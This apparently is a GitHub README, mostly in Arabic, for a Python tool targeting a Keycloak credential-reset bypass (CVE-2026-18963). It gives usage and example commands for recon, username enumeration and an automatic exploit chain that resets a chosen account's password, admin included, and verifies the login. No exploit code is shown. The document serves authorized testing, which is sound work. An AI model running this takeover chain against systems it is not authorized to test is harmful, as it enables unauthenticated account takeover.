
أداة كشف وتحقق لـ CVE-2026-18963، وهي ثغرة تجاوز حالة إعادة تعيين بيانات الاعتماد في Keycloak. تقوم ببصمة الإصدار، وتعداد النطاقات (realms) والعملاء (clients) والمستخدمين، وتختبر ما إذا كان شرط رمز الإجراء (action-token) مُطبَّقًا، وذلك للتقييمات المصرح بها.
https://github.com/user-attachments/assets/005fab89-339a-4e4e-881c-da6a626f6c9e
python3 kc-resetforge.py -h
usage: kc-resetforge.py [-h] [--target TARGET] [--targets-file TARGETS_FILE] [--port PORT] [--realm REALM]
[--client-id CLIENT_ID] [--username USERNAME] [--new-password NEW_PASSWORD] [--skip-enum]
[--enum-only] [--kc-version] [--kc-reset-link] [--corpus-dir CORPUS_DIR] [--label LABEL]
[--enum-realms] [--no-enum-realms] [--enum-clients] [--no-enum-clients] [--enum-users]
[--no-enum-users] [--realm-wordlist REALM_WORDLIST] [--client-wordlist CLIENT_WORDLIST]
[--user-wordlist USER_WORDLIST] [--enum-users-client-id ENUM_USERS_CLIENT_ID]
[--verify-login] [--no-verify-login] [--verify-client-id VERIFY_CLIENT_ID]
[--timeout TIMEOUT] [--request-delay REQUEST_DELAY] [--output-dir OUTPUT_DIR]
[--proxy PROXY] [-d] [-y] [--json-out JSON_OUT]
CVE-2026-18963 Keycloak recon + exploit framework (own infra only)
options:
-h, --help show this help message and exit
--target TARGET Single target: bare host/IP, host:port, or a full http(s)://host[:port] URL. Scheme and port
are auto-detected if omitted (tries https then http; defaults to 443/80 respectively).
Mutually exclusive with --targets-file.
--targets-file TARGETS_FILE
Path to a file with one target per line, same flexible formats as --target ('#' comments
allowed). Runs recon+exploit against every target in turn.
--port PORT Override port for --target (or a fallback for --targets-file lines without their own port).
Per-line ports in --targets-file always take precedence.
--realm REALM Realm to target. If omitted, auto-selected from recon results.
--client-id CLIENT_ID
OIDC client_id to use. If omitted, auto-selected from recon results.
--username USERNAME Username to target. If omitted, auto-selected from recon results.
--new-password NEW_PASSWORD
Password to set for the target user (default: 'Test123!')
--skip-enum Skip recon entirely; --realm/--client-id/--username become required.
--enum-only Run recon and print results, but do not attempt exploitation.
--kc-version Only run the Keycloak version recon phase (fingerprint + corpus match + patch status) and
exit - skips realm/client/user enumeration and exploitation entirely. Works with both
--target and --targets-file.
--kc-reset-link Only check whether the self-service password-reset ('Forgot Password?' /
resetPasswordAllowed) flow is exposed, then exit - a single non-destructive GET, no username
needed. Auto-discovers realm/client via a light realm+client recon unless --realm/--client-
id are given explicitly. Skips exploitation. Works with both --target and --targets-file.
--corpus-dir CORPUS_DIR
Directory of known-version fingerprints for exact version matching (default:
kc_version_corpus).
--label LABEL Save THIS target's fingerprint into the corpus under this version label instead of matching
an unknown version. Use on an instance of known version.
--enum-realms Enumerate realm names (default: on during recon).
--no-enum-realms
--enum-clients Enumerate client IDs per realm (default: on during recon).
--no-enum-clients
--enum-users Enumerate usernames per realm (default: on during recon).
--no-enum-users
--realm-wordlist REALM_WORDLIST
--client-wordlist CLIENT_WORDLIST
--user-wordlist USER_WORDLIST
--enum-users-client-id ENUM_USERS_CLIENT_ID
Client used for the username-enumeration direct-grant probe (default: admin-cli).
--verify-login After a password change, confirm the new credentials via a password-grant token request
(default: on).
--no-verify-login
--verify-client-id VERIFY_CLIENT_ID
Client used for the verification password grant.
--timeout TIMEOUT
--request-delay REQUEST_DELAY
Seconds to wait before each request in the exploit chain (default: 0.4). Keycloak's login-
flow state can be timing-sensitive across the reset/restart/selector replay steps; a small
delay makes the chain more reliable. 0 to disable.
--output-dir OUTPUT_DIR
--proxy PROXY Route through an HTTP(S) proxy: 'burp' (127.0.0.1:8080 shorthand), a bare host:port, or a
full http(s):// URL.
-d, --debug Verbose debug logging of requests/responses/enum probes
-y, --yes Skip the 'Continue with this target?' prompt. Required for non-interactive use (scripts,
--targets-file with multiple targets, CI).
--json-out JSON_OUT Write a JSON report of recon + exploit results to this path.
kc-resetforge — CVE-2026-18963 Keycloak recon + exploit tool (own infra only)
Usage
-----
Fully automatic (recon -> auto-pick target -> exploit -> verify):
python3 kc-resetforge.py --target https://localhost:9990 --proxy burp -d
Recon only:
python3 kc-resetforge.py --target https://localhost:9990 --enum-only -d
Version + patch-status check only, across many hosts:
python3 kc-resetforge.py --targets-file targets.txt --kc-version
Skip recon, target directly:
python3 kc-resetforge.py --target https://localhost:9990 --realm master \
--client-id account --username admin --skip-enum
Requires: requests, beautifulsoup4, and optionally rich (pip install --break-system-packages)
26.7.226.4.15-1 / الصور 26.4-2326.6.6-1 / الصور 26.6-12kc-resetforge هي أداة كشف/تحقق. تؤكد ما إذا كان تدفق إعادة تعيين بيانات الاعتماد في الهدف يفرض الشرط المسبق لرمز الإجراء بشكل صحيح (مُصحَّح) أم لا (ثغرة)، لاستخدامها في التقييمات المصرح بها. يغطي المقال المرتبط أدناه الآلية ومنهجية إعادة الإنتاج بالعمق المناسب للكشف العام.
التحليل الكامل: Forging kc-resetforge: Turning CVE-2026-18963 Into a Repeatable Check
لا يمكن لـ kc-resetforge.py أن يسأل Keycloak "ما هو إصدارك؟"، فلا يوجد نقطة نهاية قبل المصادقة تجيب على ذلك. بدلاً من ذلك، يأخذ بصمة الهدف (حقول الاستجابة، تجزئات الأصول الثابتة، الأيقونة المفضلة) ويقارنها بـ corpus من البصمات التي قمت بتسميتها بالفعل بإصدار معروف. عدم وجود إدخال في corpus لتلك البصمة = لا يوجد إصدار دقيق، وهذا مقصود وليس خطأ.
قم ببناء الـ corpus مرة واحدة لكل إصدار لديك حق الوصول إليه:
python3 kc-resetforge.py --target https://known-26.6.2-host --kc-version --label 26.6.2
python3 kc-resetforge.py --target https://known-26.7.2-host --kc-version --label 26.7.2
[snip]
My Lab:
python3 kc-resetforge.py --target https://localhost:9990 --kc-version --label 26.6.2
python3 kc-resetforge.py --target https://localhost:9991 --kc-version --label 26.6.3
python3 kc-resetforge.py --target https://localhost:9992 --kc-version --label 26.6.4
python3 kc-resetforge.py --target https://localhost:9993 --kc-version --label 26.7.0
python3 kc-resetforge.py --target https://localhost:9994 --kc-version --label 26.7.1
python3 kc-resetforge.py --target https://localhost:9995 --kc-version --label 26.7.2
Recon:
python3 kc-resetforge.py --targets-file targets.txt --kc-version --kc-reset-link --proxy 127.0.0.1:8080
[snip]
[*] Proxying through: http://127.0.0.1:8080
[+] Run Summary
Targets scanned
┏━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━┓
┃Target ┃ Keycloak Version ┃ Patch ┃ Reset Link ┃ Result ┃
┡━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━┩
│https://localhost:9990 │ 26.6.2 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9991 │ 26.6.3 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9992 │ 26.6.4 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9993 │ 26.7.0 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9994 │ 26.7.1 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9995 │ 26.7.2 │ PATCHED │ ENABLED │ checked│
└───────────────────────┴──────────────────┴────────────┴────────────┴────────┘
يتم حفظ الإدخالات بجوار السكربت، في kc_version_corpus/، بحيث تبقى محفوظة بغض النظر عن الدليل الذي تشغّل منه الأداة، لا تحذف هذا المجلد.
تحقق مما يوجد في الـ corpus:
ls kc_version_corpus/
بمجرد التسمية، كل فحص مستقبلي يطابق تلقائيًا ضده:
python3 kc-resetforge.py --target https://target --kc-version
python3 kc-resetforge.py --targets-file targets.txt --kc-version
يُقدَّم هذا المشروع حصريًا من أجل:
لا تشغّل هذه الأداة ضد أي نظام لا تملكه أو ليس لديك إذن كتابي صريح لاختباره. الاستخدام غير المصرح به ضد بنية تحتية تابعة لجهات خارجية غير قانوني وخارج النطاق المقصود لهذا المشروع. لا يتحمل القائم على الصيانة أي مسؤولية عن سوء الاستخدام.
| الحقل | القيمة |
|---|
| CVE | CVE-2026-18963 |
| الخطورة | حرجة |
| CVSS | 9.1 |
| CWE | CWE-640 (آلية استرداد كلمة المرور الضعيفة) |
| المكوّن | Keycloak — تدفق مصادقة إعادة تعيين بيانات الاعتماد |
| التأثير | استيلاء على الحساب بدون مصادقة وبدون أي تفاعل (يشمل حسابات المسؤولين) |
| الإصدار المُصحَّح | Keycloak 26.7.2 (المصدر الرئيسي) / RHBK 26.4.15-1, 26.6.6-1 |